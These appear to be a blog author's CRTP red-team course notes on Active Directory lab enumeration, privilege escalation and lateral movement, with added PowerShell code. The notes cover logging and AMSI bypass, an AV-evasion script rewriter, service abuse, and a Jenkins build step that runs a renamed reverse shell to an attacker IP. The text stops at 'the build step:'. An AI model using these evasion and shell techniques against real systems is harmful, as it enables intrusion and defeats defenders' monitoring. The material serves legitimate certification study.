CRTP (Certified Red Team Professional)

HackingSkills
8 min read · Nov 15, 2023

{Session1}

The scope of the labs:-
172.16.1.0/24 - 172.16.17.0/24

Active Directory is a directory database that stores information about the whole network: users, computers, groups, trusts, policies, etc.

Active Directory plays a role in management, security and interoperability.

Domains:- the partition that stores the AD objects (user, computer and group accounts, OUs, policies).

Domain Controllers:- the servers that host the domain database and are responsible for authentication and authorization within the domain.

AD components:-

there are a lot of components (LDAP, NetBIOS …) but we focus on the following:-

  1. schema: defines the object classes and attributes that can exist in the directory
  2. query and index: lets objects and their properties be published and found by users and applications
  3. global catalog: a partial, read-only copy of every object in the forest, so cross-domain lookups do not need a referral
  4. replication service: distributes directory data between the domain controllers

Active Directory structure:

An Active Directory forest contains one or more domains. Domains that share a contiguous DNS namespace (moneycorp.local and its child dollarcorp.moneycorp.local) form a tree; a forest is a collection of one or more trees that share a common schema, configuration and global catalog. Each domain can be subdivided into organizational units (OUs).

tree vs forest: a tree is about the namespace, the forest is the security and replication boundary.

we will use PowerShell for the AD attacks because of the following:-

  • scripts can be run straight from memory, without touching disk
  • it is integrated with .NET, so anything the .NET classes expose is reachable from it
  • the engine is a library (System.Management.Automation.dll), not just powershell.exe, so it is present on every modern Windows and can be loaded by other processes even when powershell.exe is blocked

PowerShell detections:

  • system-wide transcription (every session is logged to a text file)
  • script block logging (event 4104 records the de-obfuscated code that actually runs)
  • AntiMalware Scan Interface (AMSI): script content is handed to the installed AV before it runs
  • Constrained Language Mode, enforced through AppLocker or Windows Defender Application Control (WDAC)

there are four language modes:

  • FullLanguage (the default)
  • ConstrainedLanguage (no arbitrary .NET method calls, no Add-Type, no COM; this is what AppLocker/WDAC enforce)
  • RestrictedLanguage (data sections and a few operators only)
  • NoLanguage (no script text at all, only cmdlet invocation)

To check the language mode: $ExecutionContext.SessionState.LanguageMode

execution policy is not a security measure or a security control. it only stops someone from running a script by accident.

there are many ways to bypass it:

  • powershell -ExecutionPolicy Bypass
  • powershell -c ……. (run the code inline as a command, so no script file is ever "executed")
  • powershell -EncodedCommand ……. (the same, with the script Base64-encoded)
  • $env:PSExecutionPolicyPreference = "Bypass" (sets the Process-scope policy directly; Set-ExecutionPolicy -Scope Process writes the same variable)
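An added example (my own code, not part of the course material or the notes above) that reports the restrictions that matter before loading any tooling on a host, and builds an -EncodedCommand payload for the last bypass in the list. The command text is a harmless placeholder; the registry paths are the policy keys Group Policy writes for script block logging and transcription.

```powershell
# Added example (not course code): inspect the PowerShell restrictions on a host
# and build an -EncodedCommand payload. The command text is a harmless placeholder.

function Get-PSRestrictionState {
    # Policy keys written by GPO; a value of 1 means the control is switched on.
    $sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $trn = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
    [pscustomobject]@{
        # FullLanguage / ConstrainedLanguage / RestrictedLanguage / NoLanguage
        LanguageMode    = $ExecutionContext.SessionState.LanguageMode
        EffectivePolicy = Get-ExecutionPolicy
        PolicyByScope   = (Get-ExecutionPolicy -List | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join '; '
        # amsi.dll is loaded into the process when AMSI is active for this session
        AmsiLoaded      = [bool]((Get-Process -Id $PID).Modules | Where-Object ModuleName -eq 'amsi.dll')
        ScriptBlockLog  = (Get-ItemProperty $sbl -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
        Transcription   = (Get-ItemProperty $trn -ErrorAction SilentlyContinue).EnableTranscripting -eq 1
    }
}

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # -EncodedCommand takes Base64 of the UTF-16LE bytes of the script text, not UTF-8.
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Command))
}

# Placeholder command (assumption: anything you would otherwise put in a .ps1).
$cmd = 'Write-Output "encoded command ran"; $ExecutionContext.SessionState.LanguageMode'
$enc = ConvertTo-EncodedCommand $cmd

# Round-trip check: decoding must give the original text back.
$back = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc))
if ($back -ne $cmd) { throw 'encoding round-trip failed' }

Get-PSRestrictionState | Format-List
"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand $enc"
```

The policy switch and the encoding are conveniences, not evasion: script block logging records the decoded script, and the Base64 blob itself shows up in process-creation events (4688) as part of the command line. That is why the next section turns to the logging itself.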

we can also bypass the PowerShell logging described above:-

we use InviShell to bypass logging.

InviShell hooks System.Management.Automation.dll and System.Core.dll by registering itself as a CLR profiler (a DLL the runtime loads into a .NET process when the COR_ENABLE_PROFILING/COR_PROFILER variables point at it) and patches the logging functions before the PowerShell engine starts, so script block logging, module logging and transcription never see what the session runs.

the CLR is the Common Language Runtime, the .NET execution engine that loads and runs managed code such as the PowerShell engine.

two ways to run InviShell:

  1. with admin privilege (not recommended) by RunWithPathAsAdmin.bat
  2. without admin privilege (recommended) by RunWithRegistryNonAdmin.bat, which registers the profiler under HKCU so no elevation is needed

to find which exact part of a script the AV on disk (and AMSI) flags, so that we can fix it, we can use:

  1. AMSITrigger → AMSITrigger.exe -i {script_file} (submits the file to AMSI and prints the lines that trigger it)
  2. DefenderCheck → DefenderCheck.exe {script_file} (splits the file until it isolates the flagged bytes and prints them as hex)

ways to fix the scripts:-

  1. renaming the file
  2. removing the comments
  3. renaming the variables (and function names, see the Invoke-PowerShellTcp → Power rename later on)
  4. reversing strings, so the flagged literal never appears in the file

To reverse a string:-

the string is welcome

the script:-

$str = 'emoclew'

# read the string from right to left and join the characters back together
$strrev = ([regex]::Matches($str, '.', 'RightToLeft') | ForEach {$_.Value}) -join ''

$strrev is now 'welcome', but only its reverse 'emoclew' appears in the file.
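The fixes in the list above, applied in one pass, as an added example (my own code, not from the course or the notes). The sample script, the variable map and the literal to hide are made up for the demo; nothing is read from disk. Comment removal goes through the real PowerShell tokenizer so a '#' inside a string is left alone.

```powershell
# Added example (not course code): apply the script-fixing steps to a script in one pass.
# The sample script, the variable map and the literal are constructed for the demo.

function Remove-PSComments {
    param([Parameter(Mandatory)][string]$Source)
    # Tokenize with the PowerShell parser so '#' inside a string is not treated as a comment.
    $tokens = $null; $errors = $null
    [void][System.Management.Automation.Language.Parser]::ParseInput($Source, [ref]$tokens, [ref]$errors)
    $sb = New-Object System.Text.StringBuilder
    $pos = 0
    foreach ($t in $tokens) {
        if ($t.Kind -eq 'Comment') {
            [void]$sb.Append($Source.Substring($pos, $t.Extent.StartOffset - $pos))
            $pos = $t.Extent.EndOffset
        }
    }
    [void]$sb.Append($Source.Substring($pos))
    # Drop the blank lines the removed comments leave behind.
    return ($sb.ToString() -replace '(?m)^[ \t]*\r?\n', '')
}

function Rename-PSVariables {
    param([Parameter(Mandatory)][string]$Source, [Parameter(Mandatory)][hashtable]$Map)
    foreach ($old in $Map.Keys) {
        # \b stops $str from also rewriting $strrev; '$$' in a .NET replacement is a literal '$'.
        $Source = $Source -replace ('\$' + [regex]::Escape($old) + '\b'), ('$$' + $Map[$old])
    }
    return $Source
}

function Invoke-StringReverse {
    param([Parameter(Mandatory)][string]$Text)
    # Same RightToLeft trick as in the notes; -join '' reassembles without separators.
    ([regex]::Matches($Text, '.', 'RightToLeft') | ForEach-Object { $_.Value }) -join ''
}

function ConvertTo-ReversedLiteral {
    param([Parameter(Mandatory)][string]$Source, [Parameter(Mandatory)][string]$Literal)
    # Replace a flagged string literal with code that rebuilds it at run time.
    $rev  = Invoke-StringReverse $Literal
    $code = "(([regex]::Matches('$rev','.','RightToLeft') | ForEach-Object { `$_.Value }) -join '')"
    return $Source.Replace("'$Literal'", $code)
}

# Constructed sample: comments and a literal that a scanner might flag.
$sample = @'
# helper script
$str = 'welcome'   # greeting
Write-Output $str
'@

$fixed = Remove-PSComments $sample
$fixed = Rename-PSVariables -Source $fixed -Map @{ str = 'greeting' }
$fixed = ConvertTo-ReversedLiteral -Source $fixed -Literal 'welcome'
$fixed
# Behaviour is unchanged: running the rewritten script still prints "welcome".
Invoke-Expression $fixed
```

Renaming the file (fix 1) is left to you. Keep in mind what this does and does not hide: the reversed literal is not scanned when the file is read, but if the rebuilt string is itself executed with Invoke-Expression, that text is submitted to AMSI at that moment.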

We follow the assume-breach methodology: we start from the position that an attacker already has a foothold (here, a low-privileged domain user on a domain-joined machine) and work out what that foothold can reach before it gets to the important machines, rather than trying to keep the attacker out at the perimeter.

LAB ENVIRONMENT

Domain Enumeration//:

For domain enumeration we can use:- (run it inside InviShell to bypass logging)

  1. the PowerView script
  2. the Active Directory module

For the PowerView script:

  • C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
  • powershell
  • . C:\AD\Tools\PowerView.ps1
  • Get-Domain → get current domain information
  • Get-Domain -Domain {…} → get specific domain information
  • Get-DomainSID
  • Get-DomainPolicyData
  • (Get-DomainPolicyData).systemaccess → password and lockout policy
  • Get-DomainController
  • Get-DomainUser → -Properties or select to choose the fields; -LDAPFilter (alias -Filter) takes an LDAP filter such as "(description=*pass*)"
  • Get-DomainComputer → -Ping to return only hosts that answer
  • Get-DomainGroup
  • Get-DomainGroupMember
  • Get-NetLocalGroup {needs admin privilege on the target}
  • Get-NetLocalGroupMember {needs admin privilege on the target}
  • Get-NetLoggedon {needs admin privilege on the target}
  • Get-LoggedonLocal {needs the remote registry service}
  • Get-LastLoggedOn

For the Active Directory module:

  • C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
  • Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
  • Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
  • Get-Command -Module {….}
  • Get-ADDomain → get current domain information
  • Get-ADDomain -Identity {…} → get specific domain information
  • (Get-ADDomain).DomainSID
  • Get-ADDomainController
  • Get-ADUser → -Properties or select to choose the fields, -Filter "field -like '*str*'"
  • Get-ADComputer
  • Get-ADGroup
  • Get-ADGroupMember
  • Get-ADPrincipalGroupMembership

Both tool sets can also be loaded straight into memory from a web server with a download cradle instead of dot-sourcing a file on disk, but the scripts have to be hosted on that web server first.

Lab manual Learning Object 1 :-

run powerview:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

powershell

. C:\AD\Tools\PowerView.ps1

to list all users:

Get-DomainUser

Get-DomainUser | select -ExpandProperty samaccountname

to list all computers:

Get-DomainComputer | select -ExpandProperty dnshostname

to see the details of domain admin group:

Get-DomainGroup -Identity "Domain Admins"

to list the members of domain admin group:

Get-DomainGroupMember -Identity "Domain Admins"

to list the members of the Enterprise Admins group, which only exists in the forest root domain (moneycorp.local), not in the current domain:

Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local

run active directory module:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll

Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

to list all users:

Get-ADUser -Filter *

Get-ADUser -Filter * -Properties * | select SamAccountName,Description

to list all computers:

Get-ADComputer -Filter *

to list the members of domain admin group:

Get-ADGroupMember -Identity 'Domain Admins'

to list the members of the Enterprise Admins group, which only exists in the forest root domain (moneycorp.local), not in the current domain:

Get-ADGroupMember -Identity 'Enterprise Admins' -Server moneycorp.local
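The same enumeration done with the built-in ADSI classes, as an added example (my own code, not PowerView or the AD module), so it still works when neither tool can be loaded. Group names and the dollarcorp/moneycorp.local layout come from the lab; the Enterprise Admins lookup assumes the forest root's DNS name resolves from the student VM. The matching-rule OID in the group filters is LDAP_MATCHING_RULE_IN_CHAIN, which resolves nested membership server-side.

```powershell
# Added example (not PowerView / AD-module code): LDAP enumeration with plain ADSI.

function Search-Ldap {
    param(
        [Parameter(Mandatory)][string]$Filter,
        [string[]]$Properties = @('samaccountname'),
        [string]$SearchBase,      # DN to start from; default = root of the current domain
        [string]$Server           # DNS name of a domain/DC, needed for a foreign domain
    )
    $path = ''                    # [ADSI]'' binds to the default naming context
    if ($SearchBase) { $path = if ($Server) { "LDAP://$Server/$SearchBase" } else { "LDAP://$SearchBase" } }
    $s = New-Object System.DirectoryServices.DirectorySearcher(([ADSI]$path), $Filter)
    $s.PageSize = 1000            # paged search, so the 1000-object server limit is not hit
    $Properties | ForEach-Object { [void]$s.PropertiesToLoad.Add($_) }
    foreach ($r in $s.FindAll()) {
        $o = [ordered]@{}
        foreach ($p in $Properties) { $o[$p] = ($r.Properties[$p] | Select-Object -First 1) }
        [pscustomobject]$o
    }
}

# All users with their description (descriptions often leak roles or passwords).
$users = Search-Ldap '(&(objectCategory=person)(objectClass=user))' 'samaccountname','description'

# All computers.
$computers = Search-Ldap '(objectCategory=computer)' 'dnshostname','operatingsystem'

# Domain Admins, including members reached through nested groups.
$daDn = (Search-Ldap '(&(objectCategory=group)(cn=Domain Admins))' 'distinguishedname').distinguishedname
$daMembers = Search-Ldap "(&(objectCategory=person)(memberOf:1.2.840.113556.1.4.1941:=$daDn))" 'samaccountname'

# Enterprise Admins live in the forest root, so query that domain explicitly.
$rootDn  = "$(([ADSI]'LDAP://RootDSE').rootDomainNamingContext)"
$rootDns = ($rootDn -replace 'DC=', '') -replace ',', '.'      # DC=moneycorp,DC=local -> moneycorp.local
$eaDn = (Search-Ldap '(&(objectCategory=group)(cn=Enterprise Admins))' 'distinguishedname' -SearchBase $rootDn -Server $rootDns).distinguishedname
$eaMembers = Search-Ldap "(&(objectCategory=person)(memberOf:1.2.840.113556.1.4.1941:=$eaDn))" 'samaccountname' -SearchBase $rootDn -Server $rootDns

"Users: $($users.Count)  Computers: $($computers.Count)"
$users | Where-Object description | Format-Table samaccountname, description
"Domain Admins:";     $daMembers.samaccountname
"Enterprise Admins:"; $eaMembers.samaccountname
```

This produces the same LDAP traffic to the DC as the PowerView commands, which matters for the detection side: a burst of paged searches for every user and computer from a workstation is the thing a SOC keys on, whichever tool generated it.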

Group Policy manages configuration and changes: security settings, registry policy settings, Group Policy Preferences and software installation.

  • Get-DomainGPO → list GPOs; -ComputerIdentity {name} → only the GPOs applied to that computer
  • Get-DomainGPOLocalGroup → GPOs that change local group membership (Restricted Groups / Group Policy Preferences)
  • Get-DomainGPOComputerLocalGroupMapping → which users or groups end up in a local group (for example local Administrators) on which machines through those GPOs
  • Get-DomainOU/Get-ADOrganizationalUnit

End of Learning Object 2

Lab manual Learning Object 2 :-

list all the OU:

Get-DomainOU

Get-DomainOU | select -ExpandProperty name

list all the computers in the StudentMachines OU:

(Get-DomainOU -Identity StudentMachines).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

list the GPOs:

Get-DomainGPO

enumerate the GPOs applied on the StudentMachines OU:

(Get-DomainOU -Identity StudentMachines).gplink {then copy the GUID out of the gPLink value}

Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}'

OR, cutting the GUID out of the gPLink string (this substring arithmetic only works when exactly one GPO is linked to the OU):

Get-DomainGPO -Identity (Get-DomainOU -Identity StudentMachines).gplink.substring(11,(Get-DomainOU -Identity StudentMachines).gplink.length-72)
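A parser for the gPLink value, as an added example (my own code, not PowerView's or the course's), instead of the substring trick, which breaks as soon as a second GPO is linked. The sample value is constructed: the first GUID is the one from the lab notes, the second is the well-known Default Domain Policy GUID. The two option bits come from MS-GPOL (bit 0 = link disabled, bit 1 = enforced).

```powershell
# Added example (not PowerView/course code): parse gPLink properly.
# The sample value below is constructed for the demo.

function ConvertFrom-GPLink {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$GPLink)
    # Format: [LDAP://cn={GUID},cn=policies,cn=system,<domain DN>;<options>] once per link.
    foreach ($m in [regex]::Matches($GPLink, '\[LDAP://(?<dn>[^;\]]+);(?<opt>\d+)\]')) {
        $opt = [int]$m.Groups['opt'].Value
        $dn  = $m.Groups['dn'].Value
        [pscustomobject]@{
            Guid     = [regex]::Match($dn, '\{[0-9A-Fa-f-]{36}\}').Value
            Domain   = (($dn -split ',DC=' | Select-Object -Skip 1) -join '.')   # where the GPO object lives
            Disabled = [bool]($opt -band 1)
            Enforced = [bool]($opt -band 2)
        }
    }
}

$sample = '[LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]' +
          '[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;2]'
ConvertFrom-GPLink $sample | Format-Table -AutoSize

# Live, with PowerView loaded: every enabled GPO linked to the OU, however many there are.
# (Get-DomainOU -Identity StudentMachines).gplink | ConvertFrom-GPLink |
#     Where-Object { -not $_.Disabled } | ForEach-Object { Get-DomainGPO -Identity $_.Guid }
```

An enforced link (option 2) is the one to look at first when you want to know what a machine really ends up with, because it wins over links lower in the hierarchy and cannot be blocked by the child OU.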

Access Control Model: controls how a process accesses objects and other securable resources in AD, based on the access token of the caller and the security descriptor of the object.

Access Control List (ACL) → a list of access control entries (ACEs); each ACE names a trustee and the permissions it is allowed or denied on the object.

there are two types:-

  • DACL → defines the permissions trustees have on an object.
  • SACL → defines which accesses generate success and failure audit events when the object is accessed.

  • Get-DomainObjectAcl / Get-Acl → read them

End of Learning Object 3

Lab manual Learning Object 3:-

list all the ACLs for the Domain Admins group:

Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose

to check for modify rights/permissions for studentx (and for the RDPUsers group it belongs to):

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "studentx"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
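The logic behind Find-InterestingDomainAcl written out for one object, as an added example (my own code, not PowerView's): read the DACL through ADSI and keep the allow ACEs that give a principal control over the object. The Domain Admins DN and the studentx principal are lab assumptions; the small GUID table stands in for -ResolveGUIDs and only covers a few rights a red teamer cares about.

```powershell
# Added example (not PowerView code): interesting ACEs on one AD object via ADSI.

# A few well-known rights/attribute GUIDs, resolved the way -ResolveGUIDs would show them.
$KnownGuids = @{
    '00000000-0000-0000-0000-000000000000' = 'All'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member'
}

function Get-InterestingAce {
    param(
        [Parameter(Mandatory)][string]$DistinguishedName,
        [string]$Principal          # 'DOMAIN\name'; omit to list every principal
    )
    $entry = [ADSI]"LDAP://$DistinguishedName"
    $acl   = $entry.psbase.ObjectSecurity      # System.DirectoryServices.ActiveDirectorySecurity
    $interesting = 'GenericAll','GenericWrite','WriteDacl','WriteOwner','WriteProperty','ExtendedRight','Self'
    foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($Principal -and $ace.IdentityReference.Value -ne $Principal) { continue }
        $rights = $ace.ActiveDirectoryRights.ToString()
        if (-not ($interesting | Where-Object { $rights -match $_ })) { continue }
        $type = $ace.ObjectType.ToString()     # all-zero GUID = applies to the whole object
        [pscustomobject]@{
            Object     = $DistinguishedName
            Principal  = $ace.IdentityReference.Value
            Rights     = $rights
            ObjectType = if ($KnownGuids.ContainsKey($type)) { $KnownGuids[$type] } else { $type }
            Inherited  = $ace.IsInherited
        }
    }
}

# Lab DN assumed for the group; principal name as the lab uses it.
$da = 'CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
Get-InterestingAce -DistinguishedName $da | Format-Table -AutoSize
Get-InterestingAce -DistinguishedName $da -Principal 'dcorp\studentx'
```

Two things to keep in mind when reading the output. Filtering on -Principal only matches ACEs granted directly to that account; rights the user holds through a group (RDPUsers in the lab) show up under the group's name, so check those too. And a WriteProperty ACE is only interesting together with its ObjectType: WriteProperty on "member" of a group is a group-membership takeover, WriteProperty on an unrelated attribute is noise.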

End of Learning Object 3

Trusts can be:

  • one way trust — unidirectional: users in the trusted domain can reach resources in the trusting domain, not the other way round
  • two way trust — bidirectional

they can also be:

  • transitive → the trust extends to other domains the partner trusts (the default between domains in the same forest)
  • nontransitive → limited to the two domains that set it up (external trusts between domains in different forests)

the default/automatic trusts:-

  • Parent-child trust
  • Tree-root trust

forest trust → a trust between the root domains of two forests.

  • Get-DomainTrust / Get-ADTrust
  • Get-Forest / Get-ADForest
  • Get-ForestDomain / (Get-ADForest).Domains
  • Get-ForestGlobalCatalog / (Get-ADForest).GlobalCatalogs
  • Get-ForestTrust / Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

End of Learning Object 4

Lab manual Learning Object 4:-

tasks by powerview:

list all domains in the current forest:

Get-ForestDomain -Verbose

all the trusts of the dollarcorp domain:

Get-DomainTrust

list only the external trusts in the moneycorp.local forest:

Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

To identify external trusts of the dollarcorp domain:

Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

list trusts for eurocorp.local forest:

Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}

tasks by active directory module:

list all domains in the current forest:

(Get-ADForest).Domains

all the trusts of the dollarcorp domain:

Get-ADTrust -Filter *

list all the trusts in the moneycorp.local forest (one query per domain):

(Get-ADForest).Domains | %{Get-ADTrust -Filter * -Server $_}

list only the external trusts in the moneycorp.local forest:

(Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}

To identify external trusts of the dollarcorp domain:

Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)'

list trusts for eurocorp.local forest:

Get-ADTrust -Filter * -Server eurocorp.local
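Both the PowerView "FILTER_SIDS" filter and the AD-module "intraForest / ForestTransitive" filter above are reading the same trustAttributes bits on the trustedDomain objects under CN=System. The added example below (my own code, not PowerView's or the course's) enumerates those objects with ADSI and decodes the bits, so the external / forest / intra-forest classification is explicit. The flag values are the ones defined in MS-ADTS; the domain names are lab assumptions and the current domain is taken from $env:USERDNSDOMAIN.

```powershell
# Added example (not PowerView/course code): trust enumeration from trustedDomain objects.

$TrustAttributeFlags = [ordered]@{        # MS-ADTS trustAttributes bits
    NON_TRANSITIVE      = 0x1
    UPLEVEL_ONLY        = 0x2
    FILTER_SIDS         = 0x4             # QUARANTINED_DOMAIN: SID filtering on (PowerView's name for it)
    FOREST_TRANSITIVE   = 0x8
    CROSS_ORGANIZATION  = 0x10
    WITHIN_FOREST       = 0x20
    TREAT_AS_EXTERNAL   = 0x40
    USES_RC4_ENCRYPTION = 0x80
}
$TrustDirections = @{ 0 = 'Disabled'; 1 = 'Inbound'; 2 = 'Outbound'; 3 = 'Bidirectional' }

function ConvertFrom-TrustAttributes {
    param([int]$Value)
    @($TrustAttributeFlags.GetEnumerator() | Where-Object { $Value -band $_.Value } | ForEach-Object { $_.Key }) -join ','
}

function Get-TrustKind {
    param([int]$Attributes)
    if     ($Attributes -band 0x20) { 'IntraForest (parent-child or tree-root)' }
    elseif ($Attributes -band 0x8)  { 'Forest' }
    else                            { 'External' }
}

function Get-DomainTrustAdsi {
    param([string]$Domain)                 # DNS name, e.g. moneycorp.local; default = current domain
    if (-not $Domain) { $Domain = $env:USERDNSDOMAIN }
    $dn   = ($Domain.Split('.') | ForEach-Object { "DC=$_" }) -join ','
    $root = [ADSI]"LDAP://$Domain/CN=System,$dn"   # trustedDomain objects live under CN=System
    $s = New-Object System.DirectoryServices.DirectorySearcher($root, '(objectClass=trustedDomain)')
    foreach ($r in $s.FindAll()) {
        $attr = [int]($r.Properties['trustattributes'] | Select-Object -First 1)
        $dir  = [int]($r.Properties['trustdirection']  | Select-Object -First 1)
        [pscustomobject]@{
            SourceDomain = $Domain
            TargetDomain = ($r.Properties['trustpartner'] | Select-Object -First 1)
            Direction    = $TrustDirections[$dir]
            Attributes   = ConvertFrom-TrustAttributes $attr
            Kind         = Get-TrustKind $attr
            Transitive   = -not ($attr -band 0x1)
        }
    }
}

# Current domain (dollarcorp in the lab) and the forest root; external trusts only for the latter.
Get-DomainTrustAdsi | Format-Table -AutoSize
Get-DomainTrustAdsi -Domain moneycorp.local | Where-Object Kind -eq 'External' | Format-Table -AutoSize
```

The classification mirrors the AD-module filter exactly: WITHIN_FOREST set means intraForest, FOREST_TRANSITIVE set means a forest trust, anything else is external. FILTER_SIDS is usually set on external trusts, which is why the PowerView one-liner works, but it is a separate flag that an admin can also enable on a forest trust, so decode the bits rather than relying on that one value.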

Privilege Escalation//:

ways to escalate the privileges:

  • missing patches
  • automated deployment and auto-logon with clear-text passwords (unattend.xml / sysprep answer files, AutoAdminLogon registry values)
  • AlwaysInstallElevated: any user can run an MSI as SYSTEM
  • misconfigured services (writable binary, unquoted path, or a service DACL that lets the user change the binPath)
  • DLL hijacking

tools that help us escalate privileges:-

  • PowerUp
  • PrivEsc
  • winPEAS

Abusing a Jenkins instance (see below)
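Three of the checks PowerUp's Invoke-AllChecks automates, written out by hand as an added example (my own code, not PowerUp's or the course's) so the logic is visible: AlwaysInstallElevated, unquoted service paths, and service binaries or service registry keys writable by the current user. It only reports; it changes nothing. The rights masks are the Windows access-mask bits (GENERIC_WRITE, GENERIC_ALL, WRITE_DAC, WRITE_OWNER plus WriteData/AppendData for files and SetValue for registry keys).

```powershell
# Added example (not PowerUp/course code): manual versions of three privesc checks.

$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })   # my SID plus my groups' SIDs

function Test-WritableByMe {
    param($Acl, [bool]$Registry)
    if (-not $Acl) { return $false }
    # GENERIC_WRITE | GENERIC_ALL | WRITE_DAC | WRITE_OWNER, plus SetValue (registry) or WriteData|AppendData (file)
    $mask = 0x40000000 -bor 0x10000000 -bor 0x40000 -bor 0x80000 -bor $(if ($Registry) { 0x2 } else { 0x6 })
    foreach ($rule in $Acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($rule.AccessControlType -ne 'Allow') { continue }        # deny ACEs are not evaluated: verify hits by hand
        if ($mySids -notcontains $rule.IdentityReference.Value) { continue }
        $rights = if ($Registry) { [int]$rule.RegistryRights } else { [int]$rule.FileSystemRights }
        if ($rights -band $mask) { return $true }
    }
    return $false
}

function Test-AlwaysInstallElevated {
    $k = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty "HKLM:\$k" -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $hkcu = (Get-ItemProperty "HKCU:\$k" -ErrorAction SilentlyContinue).AlwaysInstallElevated
    return ($hklm -eq 1 -and $hkcu -eq 1)       # both must be set for MSIs to install as SYSTEM
}

function Get-ServiceWeakness {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        # Binary path: quoted -> the quoted part; unquoted -> everything up to the first .exe
        $exe = if ($path -match '^"([^"]+)"') { $Matches[1] } elseif ($path -match '^(.+?\.exe)') { $Matches[1] } else { $path }
        $unquoted    = ($path -notmatch '^"') -and ($exe -match ' ')
        $binWritable = (Test-Path -LiteralPath $exe) -and
                       (Test-WritableByMe (Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue) $false)
        $regPath     = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"   # ImagePath lives here
        $regWritable = (Test-Path $regPath) -and
                       (Test-WritableByMe (Get-Acl $regPath -ErrorAction SilentlyContinue) $true)
        if ($unquoted -or $binWritable -or $regWritable) {
            [pscustomobject]@{
                Service = $svc.Name; RunsAs = $svc.StartName; UnquotedPath = $unquoted
                BinaryWritable = $binWritable; RegKeyWritable = $regWritable; Path = $path
            }
        }
    }
}

"AlwaysInstallElevated: $(Test-AlwaysInstallElevated)"
Get-ServiceWeakness | Format-Table -AutoSize
```

An unquoted path is only exploitable if one of the directories on the way (for example C:\ or C:\Program Files\) lets you drop a file there, and a writable binary or key only pays off if the service runs as SYSTEM or another interesting account and you can restart it; read the RunsAs column before getting excited. The service-config weakness that Invoke-ServiceAbuse uses in the lab (a permissive DACL on the service object itself, which sc sdshow exposes) is a fourth check that this script does not do.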

Lab manual Learning Object 5:-

run powerup:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

powershell

. C:\AD\Tools\PowerUp.ps1

check for any privilege escalation:

Invoke-AllChecks

exploit and escalate the privilege by using the findings:

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose

identify a machine in the domain where studentx has local administrative access:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess

connect to dcorp-adminsrv:

winrs -r:dcorp-adminsrv cmd

whoami

hostname

OR

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

[dcorp-adminsrv.dollarcorp.moneycorp.local]

whoami

hostname

Abusing the Jenkins instance:

http://172.16.3.11:8080 in Edge

go to the "People" page

Jenkins has no password policy by default, and many users use their username as the password.

the user builduser has the password builduser. builduser can Configure builds and Add Build Steps, which lets us execute commands on the Jenkins host.

Configure → Build → Add build step (Execute Windows batch command)

We renamed the function Invoke-PowerShellTcp to Power in the script to bypass Windows Defender.

the call appended at the end of the script: Power -Reverse -IPAddress 172.16.100.X -Port 443

the build step:

